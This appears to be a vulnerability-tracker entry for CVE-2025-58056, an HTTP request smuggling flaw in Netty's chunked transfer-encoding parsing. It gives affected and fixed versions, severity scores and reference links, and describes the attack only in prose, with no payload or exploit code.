CVE-2025-58056
HIGHNetty < 4.1.125 - HTTP Request Smuggling via Inconsistent Chunked Transfer Encoding
Title source: llmDescription
Netty is an asynchronous event-driven network application framework for development of maintainable high performance protocol servers and clients. In versions 4.1.124.Final, and 4.2.0.Alpha3 through 4.2.4.Final, Netty incorrectly accepts standalone newline characters (LF) as a chunk-size line terminator, regardless of a preceding carriage return (CR), instead of requiring CRLF per HTTP/1.1 standards. When combined with reverse proxies that parse LF differently (treating it as part of the chunk extension), attackers can craft requests that the proxy sees as one request but Netty processes as two, enabling request smuggling attacks. This is fixed in versions 4.1.125.Final and 4.2.5.Final.
References (7)
Core 7
Core References
Exploit, Vendor Advisory x_refsource_confirm
https://github.com/netty/netty/security/advisories/GHSA-fghv-69vj-qj49
Issue Tracking, Third Party Advisory x_refsource_misc
https://github.com/JLLeitschuh/unCVEed/issues/1
Issue Tracking x_refsource_misc
https://github.com/netty/netty/issues/15522
Issue Tracking, Patch x_refsource_misc
https://github.com/netty/netty/pull/15611
Patch x_refsource_misc
https://github.com/netty/netty/commit/edb55fd8e0a3bcbd85881e423464f585183d1284
Technical Description x_refsource_misc
https://datatracker.ietf.org/doc/html/rfc9112#name-chunked-transfer-coding
Broken Link x_refsource_misc
https://w4ke.info/2025/06/18/funky-chunks.html
Scores
CVSS v3
7.5
EPSS
0.0063
EPSS Percentile
45.3%
Attack Vector
NETWORK
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
CISA SSVC
Vulnrichment
Exploitation
none
Automatable
no
Technical Impact
partial
Details
CWE
CWE-444
Status
published
Products (2)
io.netty/netty-codec-http
0 - 4.1.125.FinalMaven
netty/netty
< 4.1.125
Published
Sep 03, 2025
Tracked Since
Feb 18, 2026